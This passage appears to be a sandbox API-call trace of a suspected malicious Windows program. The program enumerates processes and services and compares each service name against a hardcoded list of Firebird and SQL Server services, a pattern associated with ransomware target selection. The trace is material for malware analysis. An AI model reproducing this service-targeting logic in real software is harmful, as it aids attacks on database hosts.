[0284.389] lstrlenW (lpString="PlugPlay") returned 8 [0284.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0284.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0284.389] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0284.389] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0284.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0284.389] lstrlenW (lpString="Power") returned 5 [0284.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0284.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0284.389] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0284.389] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0284.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0284.389] lstrlenW (lpString="ProfSvc") returned 7 [0284.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0284.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0284.390] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0284.390] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0284.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0284.390] lstrlenW (lpString="RpcEptMapper") returned 12 [0284.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0284.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0284.390] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0284.390] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0284.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0284.390] lstrlenW (lpString="RpcSs") returned 5 [0284.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0284.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0284.390] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0284.390] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0284.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0284.390] lstrlenW (lpString="SamSs") returned 5 [0284.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0284.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0284.390] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0284.390] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0284.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0284.390] lstrlenW (lpString="Schedule") returned 8 [0284.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0284.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0284.390] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0284.391] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0284.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0284.391] lstrlenW (lpString="SecurityHealthService") returned 21 [0284.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0284.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0284.391] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0284.391] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0284.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0284.391] lstrlenW (lpString="SENS") returned 4 [0284.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0284.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0284.391] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0284.391] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0284.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0284.391] lstrlenW (lpString="ShellHWDetection") returned 16 [0284.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0284.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0284.391] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0284.391] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0284.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0284.391] lstrlenW (lpString="Spooler") returned 7 [0284.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0284.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0284.391] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0284.391] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0284.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0284.392] lstrlenW (lpString="StateRepository") returned 15 [0284.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0284.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0284.392] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0284.392] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0284.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0284.392] lstrlenW (lpString="SysMain") returned 7 [0284.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0284.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0284.392] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0284.392] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0284.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0284.392] lstrlenW (lpString="SystemEventsBroker") returned 18 [0284.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0284.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0284.392] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0284.392] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0284.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0284.392] lstrlenW (lpString="Themes") returned 6 [0284.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0284.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0284.392] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0284.392] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0284.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0284.392] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0284.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0284.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0284.393] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0284.393] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0284.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0284.393] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0284.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0284.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0284.393] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0284.393] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0284.393] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4012740 | out: hHeap=0x470000) returned 1 [0284.393] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0284.402] Process32FirstW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.402] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0284.403] lstrlenW (lpString="System") returned 6 [0284.403] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0284.404] lstrlenW (lpString="smss.exe") returned 8 [0284.404] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.404] lstrlenW (lpString="csrss.exe") returned 9 [0284.404] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0284.405] lstrlenW (lpString="wininit.exe") returned 11 [0284.405] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.406] lstrlenW (lpString="csrss.exe") returned 9 [0284.406] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0284.406] lstrlenW (lpString="winlogon.exe") returned 12 [0284.406] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0284.407] lstrlenW (lpString="services.exe") returned 12 [0284.407] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0284.407] lstrlenW (lpString="lsass.exe") returned 9 [0284.407] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0284.408] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0284.408] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0284.409] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0284.409] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.409] lstrlenW (lpString="svchost.exe") returned 11 [0284.409] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.410] lstrlenW (lpString="svchost.exe") returned 11 [0284.410] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0284.411] lstrlenW (lpString="dwm.exe") returned 7 [0284.411] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.411] lstrlenW (lpString="svchost.exe") returned 11 [0284.411] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.412] lstrlenW (lpString="svchost.exe") returned 11 [0284.412] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.412] lstrlenW (lpString="svchost.exe") returned 11 [0284.412] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.413] lstrlenW (lpString="svchost.exe") returned 11 [0284.413] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.414] lstrlenW (lpString="svchost.exe") returned 11 [0284.414] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.414] lstrlenW (lpString="svchost.exe") returned 11 [0284.414] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.415] lstrlenW (lpString="svchost.exe") returned 11 [0284.415] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.416] lstrlenW (lpString="svchost.exe") returned 11 [0284.416] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.416] lstrlenW (lpString="svchost.exe") returned 11 [0284.416] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.417] lstrlenW (lpString="svchost.exe") returned 11 [0284.417] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0284.418] lstrlenW (lpString="spoolsv.exe") returned 11 [0284.418] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.418] lstrlenW (lpString="svchost.exe") returned 11 [0284.418] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0284.419] lstrlenW (lpString="audiodg.exe") returned 11 [0284.419] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0284.419] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0284.420] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0284.591] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0284.591] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0284.591] lstrlenW (lpString="Memory Compression") returned 18 [0284.591] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0284.592] lstrlenW (lpString="taskhostw.exe") returned 13 [0284.592] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0284.593] lstrlenW (lpString="sihost.exe") returned 10 [0284.593] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.594] lstrlenW (lpString="svchost.exe") returned 11 [0284.594] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="MDMAgent.exe")) returned 1 [0284.594] lstrlenW (lpString="MDMAgent.exe") returned 12 [0284.594] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0284.595] lstrlenW (lpString="taskhostw.exe") returned 13 [0284.595] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0284.595] lstrlenW (lpString="explorer.exe") returned 12 [0284.595] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0284.596] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0284.596] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0284.598] lstrlenW (lpString="SearchUI.exe") returned 12 [0284.598] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0284.600] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0284.600] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.600] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0284.600] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0284.601] lstrlenW (lpString="mobsync.exe") returned 11 [0284.601] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0284.601] lstrlenW (lpString="wdgmug.exe") returned 10 [0284.601] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0284.602] lstrlenW (lpString="cmd.exe") returned 7 [0284.602] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0284.603] lstrlenW (lpString="conhost.exe") returned 11 [0284.603] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0284.603] CloseHandle (hObject=0x37c) returned 1 [0284.603] Sleep (dwMilliseconds=0x1f4) [0285.321] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4013ed0 [0285.321] EnumServicesStatusExW (in: hSCManager=0x4013ed0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0285.322] GetLastError () returned 0xea [0285.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4ed8f0 [0285.322] EnumServicesStatusExW (in: hSCManager=0x4013ed0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4ed8f0, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4ed8f0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0285.323] CloseServiceHandle (hSCObject=0x4013ed0) returned 1 [0285.324] lstrlenW (lpString="AppXSvc") returned 7 [0285.324] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0285.324] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0285.324] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0285.324] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0285.324] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0285.324] lstrlenW (lpString="AudioEndpointBuilder") 